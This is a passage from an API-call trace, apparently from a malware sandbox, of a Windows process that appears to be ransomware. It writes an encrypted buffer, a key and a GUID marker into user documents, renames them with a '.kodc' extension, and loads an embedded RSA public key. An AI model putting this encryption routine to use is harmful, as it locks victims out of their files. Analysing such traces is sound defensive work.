Size=0x9) returned 0x331aac0 [0098.577] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec10 [0098.577] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c770 [0098.577] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0098.577] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0098.577] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0098.578] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c428 [0098.578] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0098.578] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0098.578] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0098.578] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aad8 | out: hHeap=0x630000) returned 1 [0098.578] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0098.578] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aac0 | out: hHeap=0x630000) returned 1 [0098.578] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0098.578] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0098.578] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0098.578] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0098.578] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0098.578] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0098.578] GetCurrentThreadId () returned 0x42c [0098.578] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0098.578] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9b8f1a8 [0098.578] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0098.578] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x692d18 [0098.578] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0098.578] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0098.578] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0098.578] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0098.579] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.579] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.579] GetCurrentThreadId () returned 0x42c [0098.579] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.579] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.579] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0098.579] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.579] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.579] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.579] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.579] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0098.579] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0098.579] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0098.579] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x3318ea0 [0098.579] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0098.579] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0098.579] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0098.579] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0098.579] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0098.579] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0098.579] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0098.579] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0098.579] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0098.579] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0098.579] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0098.580] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0098.580] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331aac0 [0098.580] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0098.580] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec80 [0098.580] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0098.580] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0098.580] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0098.580] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0098.580] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0098.580] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331aad8 [0098.580] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0098.580] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0098.580] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0098.580] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331aaa8 [0098.580] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0098.580] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0098.580] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0098.580] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0098.580] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0098.580] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0098.580] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0098.580] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331aaf0 [0098.580] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0098.580] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a568 [0098.580] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0098.580] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec60 [0098.580] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0098.581] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0098.581] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0098.581] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0098.581] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aac0 | out: hHeap=0x630000) returned 1 [0098.581] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331aac0 [0098.581] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0098.581] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0098.581] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0098.581] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c770 [0098.581] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0098.581] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x32d0958 [0098.581] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad520 | out: hHeap=0x630000) returned 1 [0098.581] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x9b8c540 [0098.581] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0098.581] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c658 [0098.581] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aac0 | out: hHeap=0x630000) returned 1 [0098.581] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x32cef08 [0098.581] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0098.581] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0098.582] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0098.582] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x692d18 | out: hHeap=0x630000) returned 1 [0098.582] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69be70 | out: hHeap=0x630000) returned 1 [0098.582] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bd68 | out: hHeap=0x630000) returned 1 [0098.582] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad2c0 | out: hHeap=0x630000) returned 1 [0098.582] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0098.582] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0098.582] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0098.582] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0098.582] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0098.582] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aaf0 | out: hHeap=0x630000) returned 1 [0098.582] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0098.582] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0098.582] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0098.582] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aad8 | out: hHeap=0x630000) returned 1 [0098.582] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aaa8 | out: hHeap=0x630000) returned 1 [0098.582] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3298d18 | out: hHeap=0x630000) returned 1 [0098.582] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0098.582] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bc60 | out: hHeap=0x630000) returned 1 [0098.582] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aa90 | out: hHeap=0x630000) returned 1 [0098.583] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9d378 | out: hHeap=0x630000) returned 1 [0098.583] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b96968 | out: hHeap=0x630000) returned 1 [0098.583] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69ba50 | out: hHeap=0x630000) returned 1 [0098.583] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318ea0 | out: hHeap=0x630000) returned 1 [0098.583] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0098.583] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adf00 | out: hHeap=0x630000) returned 1 [0098.583] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0098.583] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0098.583] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0098.583] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0098.583] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0098.583] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cc1c0 | out: hHeap=0x630000) returned 1 [0098.583] WriteFile (in: hFile=0x5cc, lpBuffer=0x9ba4d90*, nNumberOfBytesToWrite=0x6f36, lpNumberOfBytesWritten=0x9e2fb14, lpOverlapped=0x0 | out: lpBuffer=0x9ba4d90*, lpNumberOfBytesWritten=0x9e2fb14*=0x6f36, lpOverlapped=0x0) returned 1 [0098.583] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9ba4d90 | out: hHeap=0x630000) returned 1 [0098.583] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x6f3b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.583] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0098.584] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0098.584] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce2d8 [0098.584] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x333a888 [0098.584] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x333a888, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0098.584] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x333b018 [0098.584] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333a888 | out: hHeap=0x630000) returned 1 [0098.584] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce2d8 | out: hHeap=0x630000) returned 1 [0098.584] WriteFile (in: hFile=0x5cc, lpBuffer=0x333b018*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x333b018*, lpNumberOfBytesWritten=0x9e2fb50*=0x28, lpOverlapped=0x0) returned 1 [0098.584] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0098.584] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0098.584] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0098.584] CloseHandle (hObject=0x5cc) returned 1 [0098.593] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x692d18 [0098.593] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x890) returned 0x32d0db8 [0098.593] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x692d18 | out: hHeap=0x630000) returned 1 [0098.593] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PPuq-6TBJx4FV5.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ppuq-6tbjx4fv5.docx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PPuq-6TBJx4FV5.docx.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ppuq-6tbjx4fv5.docx.kodc")) returned 1 [0098.594] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0098.594] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.594] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.595] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e7c0 | out: hHeap=0x630000) returned 1 [0098.595] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83c25230, ftCreationTime.dwHighDateTime=0x1d5c220, ftLastAccessTime.dwLowDateTime=0x479e9700, ftLastAccessTime.dwHighDateTime=0x1d5b839, ftLastWriteTime.dwLowDateTime=0x479e9700, ftLastWriteTime.dwHighDateTime=0x1d5b839, nFileSizeHigh=0x0, nFileSizeLow=0x7bea, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PXJqZm5D98Ur_npQ.odt", cAlternateFileName="PXJQZM~1.ODT")) returned 1 [0098.595] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce2d8 [0098.595] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8e) returned 0x65e7c0 [0098.595] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce2d8 | out: hHeap=0x630000) returned 1 [0098.595] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PXJqZm5D98Ur_npQ.odt") returned=".odt" [0098.595] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PXJqZm5D98Ur_npQ.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\pxjqzm5d98ur_npq.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0098.595] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=31722) returned 1 [0098.595] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0098.599] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x7bc4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.599] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0098.600] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0098.600] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.600] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.600] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x7bea, lpOverlapped=0x0) returned 1 [0098.600] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.600] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0098.601] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.601] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.601] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x692d18) returned 1 [0098.601] CryptCreateHash (in: hProv=0x692d18, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0098.602] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0098.602] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0098.602] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0098.602] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0098.602] GetLastError () returned 0x0 [0098.602] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0098.602] CryptReleaseContext (hProv=0x692d18, dwFlags=0x0) returned 1 [0098.602] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0098.602] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0098.602] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0098.602] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0098.602] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0098.602] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.602] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0098.602] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x7bf0) returned 0x9ba4d90 [0098.603] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0098.603] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0098.603] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0098.603] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0098.603] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0098.603] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0098.603] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9d378 [0098.603] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331aa90 [0098.603] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9d3c0 [0098.603] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331aaa8 [0098.603] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331aad8 [0098.603] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0098.603] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331aaf0 [0098.603] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0098.603] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0098.603] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32d0958 [0098.603] RtlAllocateHeap (HeapHandle=0x630000, 